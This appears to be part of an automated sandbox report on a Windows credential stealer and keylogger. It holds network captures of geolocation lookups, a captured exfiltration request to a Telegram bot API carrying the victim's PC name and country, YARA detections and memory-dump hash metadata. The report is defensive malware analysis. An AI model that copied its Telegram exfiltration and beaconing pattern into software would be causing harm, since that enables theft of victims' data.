                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1597&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1817050&cwnd=248&unsent_bytes=0&cid=4dc63db8c35b5887&ts=243&x=0"
                                                                                          Timestamp: 2025-01-06 06:41:08 UTC  Bytes transferred: 362  Direction: IN  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session ID: 1  Source IP: 192.168.2.7  Source Port: 49706  Destination IP: 188.114.97.3  Destination Port: 443  PID: 7432  Process: C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          Timestamp: 2025-01-06 06:41:11 UTC  Bytes transferred: 61  Direction: OUT  Data: GET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Timestamp: 2025-01-06 06:41:11 UTC  Bytes transferred: 854  Direction: IN  Data: HTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:11 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460460
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RmkKcjyvHtn33kKWhdvwJuFKw6ykcpR1HcFweyi8wdJ2dz7IzVyj92cI8%2BEBJxf%2BvblbkyfF1dRgty0M8RYG0dkkelw9wu8kZbFKPNvG94nZcQZPjUNgOZbwXvBt1gzXZzwHfpJu"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b88dbaec43f1-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4172&min_rtt=1602&rtt_var=2290&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1822721&cwnd=218&unsent_bytes=0&cid=00b6a7e2fcaea1ae&ts=151&x=0"
                                                                                          Timestamp: 2025-01-06 06:41:11 UTC  Bytes transferred: 362  Direction: IN  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session ID: 2  Source IP: 192.168.2.7  Source Port: 49708  Destination IP: 188.114.97.3  Destination Port: 443  PID: 7432  Process: C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          Timestamp: 2025-01-06 06:41:14 UTC  Bytes transferred: 85  Direction: OUT  Data: GET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          Timestamp: 2025-01-06 06:41:14 UTC  Bytes transferred: 859  Direction: IN  Data: HTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:14 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460463
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7pPw44ElCQbWCXghbvQ%2B9MPeaStnG7fDbuIFLZbfaYEIMHK9frQRkvMuVfVUEBAzg35mtbWrnLslttKKxMOq1%2F0OSFUZmD%2FnAsMZle07RvS46jl%2Fm8hyNk1AUelW%2F3V8LvGJnyKJ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b8a2ffe34237-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1709&rtt_var=665&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1615938&cwnd=194&unsent_bytes=0&cid=d2e8156bc8779445&ts=138&x=0"
                                                                                          Timestamp: 2025-01-06 06:41:14 UTC  Bytes transferred: 362  Direction: IN  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session ID: 3  Source IP: 192.168.2.7  Source Port: 49711  Destination IP: 188.114.97.3  Destination Port: 443  PID: 7432  Process: C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          Timestamp: 2025-01-06 06:41:16 UTC  Bytes transferred: 85  Direction: OUT  Data: GET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          Timestamp: 2025-01-06 06:41:16 UTC  Bytes transferred: 853  Direction: IN  Data: HTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:16 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460465
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZAjoMAPdQZkyueQvhDD38ASnxX9EUZOF3IvTmupSZUek7RfHvPkpNlz6%2BosJOmYMUPCEzYYUkJRNUB3Pia8P2fmgiknFuLJXSk4rmayIj7uqvHndN4nlxBa3eqPMQ4HBJA%2FJlLRz"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b8ababe57290-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1954&rtt_var=740&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1470292&cwnd=249&unsent_bytes=0&cid=497d8d80d5b3627d&ts=140&x=0"
                                                                                          Timestamp: 2025-01-06 06:41:16 UTC  Bytes transferred: 362  Direction: IN  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session ID: 4  Source IP: 192.168.2.7  Source Port: 49750  Destination IP: 188.114.97.3  Destination Port: 443  PID: 7432  Process: C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          Timestamp: 2025-01-06 06:41:21 UTC  Bytes transferred: 85  Direction: OUT  Data: GET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          Timestamp: 2025-01-06 06:41:21 UTC  Bytes transferred: 855  Direction: IN  Data: HTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:21 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460470
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LAbhHh9QOAl1M7lJa76P8aYEGML1Q1pa6vh8tfrOI4KuID25NJw4QyekHcT7Nlzf4OWgAPfJofGauOmwQaTpQMknLy4YwezPnna7k%2BSM3%2FuWWlVIUpcDzmJYgRvsJK6%2B0b0aOMS4"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b8cd1e947c93-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1816&rtt_var=695&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1558164&cwnd=210&unsent_bytes=0&cid=28c2e7e1814e0bfd&ts=140&x=0"
                                                                                          Timestamp: 2025-01-06 06:41:21 UTC  Bytes transferred: 362  Direction: IN  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                          Session ID: 5  Source IP: 192.168.2.7  Source Port: 49761  Destination IP: 188.114.97.3  Destination Port: 443  PID: 7432  Process: C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          Timestamp: 2025-01-06 06:41:22 UTC  Bytes transferred: 85  Direction: OUT  Data: GET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          Timestamp: 2025-01-06 06:41:22 UTC  Bytes transferred: 855  Direction: IN  Data: HTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:22 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460472
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NBPbxESmJvuAlw0yhIzHPX%2B7XQwVWbdson6a0EjrjWAV8YaAdIep4wOp7mZrh%2BcVknBy%2BtpzqOVLbNyTnKZBmTf3eXYWOIFieV4NRY1z6f0Q0u1Ca36CuvJURz5tJs9xxA46VTWm"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b8d6581242f2-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1722&rtt_var=651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1675272&cwnd=222&unsent_bytes=0&cid=0ad38f9d44efe2ed&ts=159&x=0"
                                                                                          2025-01-06 06:41:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.7  49772        188.114.97.34   443               7432  C:\Users\user\Desktop\kP8EgMorTr.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-06 06:41:24 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-01-06 06:41:24 UTC  855                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 06 Jan 2025 06:41:24 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1460473
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FmcRFT1EreoCyY9LGAvGv9wkb4n%2F8j2Z83D01m5YWqNapMT16PqZROLCpf%2BVo5YikphnkZa19pJN01dxymbV8ZJzjWVPS1U6zE63n3zdLKPF0xmEmJnr0zJypvcbVgNd9ltl%2FRgb"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8fd9b8df5eb6438b-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1549&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1821584&cwnd=169&unsent_bytes=0&cid=e52786e830295ead&ts=158&x=0"
2025-01-06 06:41:24 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.7  49784        188.114.97.34   443               7432  C:\Users\user\Desktop\kP8EgMorTr.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-06 06:41:25 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
2025-01-06 06:41:25 UTC  851                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 06 Jan 2025 06:41:25 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1460474
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SkZaY5fe1nnAq3uwrSSmsuBijRBwBJE5virQps18fppC39v9nDd4AfU5DrD0cAQMeXbxZCiIRYGI1Cq%2FAvUoDVSv8o3TR7qCJ85SRI0PdG6DDAfLnjCya6j5blaghALJ2NC5CgkV"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8fd9b8e809c4421d-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1906&min_rtt=1906&rtt_var=715&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1531200&cwnd=177&unsent_bytes=0&cid=12162f04d6edbbc5&ts=156&x=0"
2025-01-06 06:41:25 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
8           192.168.2.7  49790        149.154.167.220  443               7432  C:\Users\user\Desktop\kP8EgMorTr.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-06 06:41:26 UTC  349                OUT        GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2006/01/2025%20/%2020:38:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                       Host: api.telegram.org
                                                       Connection: Keep-Alive
2025-01-06 06:41:26 UTC  344                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx/1.18.0
                                                       Date: Mon, 06 Jan 2025 06:41:26 GMT
                                                       Content-Type: application/json
                                                       Content-Length: 55
                                                       Connection: close
                                                       Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                       Access-Control-Allow-Origin: *
                                                       Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-06 06:41:26 UTC  55                 IN         Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Target ID: 0
Start time: 01:41:03
Start date: 06/01/2025
Path: C:\Users\user\Desktop\kP8EgMorTr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\kP8EgMorTr.exe"
Imagebase: 0x260000
File size: 781'312 bytes
MD5 hash: 8A51BDA9C0CD3D8519C1156DFA39426B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1254420339.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 3
Start time: 01:41:04
Start date: 06/01/2025
Path: C:\Users\user\Desktop\kP8EgMorTr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\kP8EgMorTr.exe"
Imagebase: 0xf50000
File size: 781'312 bytes
MD5 hash: 8A51BDA9C0CD3D8519C1156DFA39426B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

                                                                                            Execution Graph

                                                                                            Execution Coverage:12.2%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:2.4%
                                                                                            Total number of Nodes:126
                                                                                            Total number of Limit Nodes:11

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'q$Teq$\ lw$xbq
                                                                                            • API String ID: 0-807568411
                                                                                            • Opcode ID: 43caaa1d3a594bd513f430443e8fb28af4a6d34f070bb41bd0b84b8a9247146e
                                                                                            • Instruction ID: d71c5ee6c6670692f03a34bff2a9511b72225cd50d3acfc0118d45faa731ff8d
                                                                                            • Opcode Fuzzy Hash: 43caaa1d3a594bd513f430443e8fb28af4a6d34f070bb41bd0b84b8a9247146e
                                                                                            • Instruction Fuzzy Hash: 03B2B175E006288FDB64CF69C984BD9BBB2FF89304F1581E9D509AB265DB319E81CF40

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $Iq
                                                                                            • API String ID: 0-312629932
                                                                                            • Opcode ID: e6aab798c105746260f7c45a648c810a6c3b755ee2746c8461924b86079ee00b
                                                                                            • Instruction ID: 7e4dcd2aaaef5b8379c136eb7b7237a23e0b036dae7f50eda16c7c4a88c641e9
                                                                                            • Opcode Fuzzy Hash: e6aab798c105746260f7c45a648c810a6c3b755ee2746c8461924b86079ee00b
                                                                                            • Instruction Fuzzy Hash: 0B93E774A056198FDB64DF28C884AE9B3B1FF89304F1146E9E50C6B3A0DB35AE85CF51

                                                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                                                            control_flow_graph (rendered graph collapsed to its recoverable data): function 4bf8818-4bfcd9d in the 04BF0000 dump, an alternate entry into the same code as the graph above (its Instruction Fuzzy Hash differs from the previous one only in the leading bytes). Same callee set: 4bf85f4 through 4bf87f4 at 0x10 intervals plus 4bf33b0, with the call at 4bf9383 again resolving to either 4bfd881 or 4bfd890; the single large block 4bf9617-4bfcb64 contains the repeated runs of calls to 4bf8674, 4bf8694, 4bf8714, 4bf8724 and 4bf86d4.
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $Iq
                                                                                            • API String ID: 0-312629932
                                                                                            • Opcode ID: 2b7ed54ffa1597600b121e8d42e3f64b32ec23fccfd6975466096e3d04f15032
                                                                                            • Instruction ID: 5d53ecaba4b3471ed3cabdd343cdefa2275a5c0a99b252b174a08954d49dcb91
                                                                                            • Opcode Fuzzy Hash: 2b7ed54ffa1597600b121e8d42e3f64b32ec23fccfd6975466096e3d04f15032
                                                                                            • Instruction Fuzzy Hash: 5593E674A056198FDB64DF28C884AE9B3B1FF89304F1146E9E50C6B3A0DB35AE85CF51

                                                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                                                            control_flow_graph (rendered graph collapsed to its recoverable data): function 6d00cf8-6d01541 in the 06D00000 dump. Callees: 6d00114, 6d00124, 6d00134, 6d00144, 6d00154 (spaced 0x10 apart); 6d00114/6d00124 are called from the block starting at 6d00f0b, 6d00134 from 6d00fd6, 6d00144 from 6d012a7 and 6d00154 from 6d0136b. The remaining blocks are short compare-and-branch chains with no calls.
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PHq
                                                                                            • API String ID: 0-3820536768
                                                                                            • Opcode ID: b6bb5d40d8fb5046111123318cebe1969f1a75809976b0eb7aadfcd490adf1fc
                                                                                            • Instruction ID: 13d4b7e1b525b11c59b9a1664587af5a91c1e123c72084eb687016211aee73fd
                                                                                            • Opcode Fuzzy Hash: b6bb5d40d8fb5046111123318cebe1969f1a75809976b0eb7aadfcd490adf1fc
                                                                                            • Instruction Fuzzy Hash: A242FA71E0061A8FDB54DF68C884BEDF7B1FF89300F1486AAD459A7251EB70A985CF90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Ppq
                                                                                            • API String ID: 0-1927884935
                                                                                            • Opcode ID: 91f8c794794ba0eb6037eaa4b3022caa7c3fa6e5ab139c549fb19678dc6d8163
                                                                                            • Instruction ID: dbc9965511bfdd42d67ec26006e0d3a1a522a7c73ea26bb91c441387aec83c91
                                                                                            • Opcode Fuzzy Hash: 91f8c794794ba0eb6037eaa4b3022caa7c3fa6e5ab139c549fb19678dc6d8163
                                                                                            • Instruction Fuzzy Hash: 0581B074E012089FDB15DFA9D884AEDBBF2FF88300F24852AE519AB355DB346946CF40
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Ppq
                                                                                            • API String ID: 0-1927884935
                                                                                            • Opcode ID: 18c1d8d0d966451241d4ca82c4c99f4f2f5958eea3ab2775b562f832d239683a
                                                                                            • Instruction ID: fc2af5044272ffd8fc71b1bf34dcfc8856c0daa72c3656d1fc2b9cb53cf504dd
                                                                                            • Opcode Fuzzy Hash: 18c1d8d0d966451241d4ca82c4c99f4f2f5958eea3ab2775b562f832d239683a
                                                                                            • Instruction Fuzzy Hash: F681A274E002089FDB14DFA9D984AEDBBF2FF88300F24852AE519AB355DB346946CF50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07e962e372034c90b8311a2e68ada87d4ebaeb94cc324b36b10f4c02993e09f3
                                                                                            • Instruction ID: b080b645961bfcf77e759fae24f379315a1e49ea0d1dda88de399f4f68ce21a6
                                                                                            • Opcode Fuzzy Hash: 07e962e372034c90b8311a2e68ada87d4ebaeb94cc324b36b10f4c02993e09f3
                                                                                            • Instruction Fuzzy Hash: D2323F70E002189FEB64DFB9D8507AEB7F2FF84300F14856AD509AB395DA34AD45CB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 729d10dbd8a5f363daf19ed9041534fc1f2bea123d869347f01b31df0ea1477a
                                                                                            • Instruction ID: 4f2e288b9aa17c3fdf4a5f5092c42226e7e23bc2a7f0b7bec68fe5ca1955ed27
                                                                                            • Opcode Fuzzy Hash: 729d10dbd8a5f363daf19ed9041534fc1f2bea123d869347f01b31df0ea1477a
                                                                                            • Instruction Fuzzy Hash: 74526D34A007458FDB14DF28C844B99B7B2FF89314F2582E9D5586F3A2DB71A986CF81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf202b0da8ed9723126b87efd057d10958f7c0fce0866a8efd90e4a70af61148
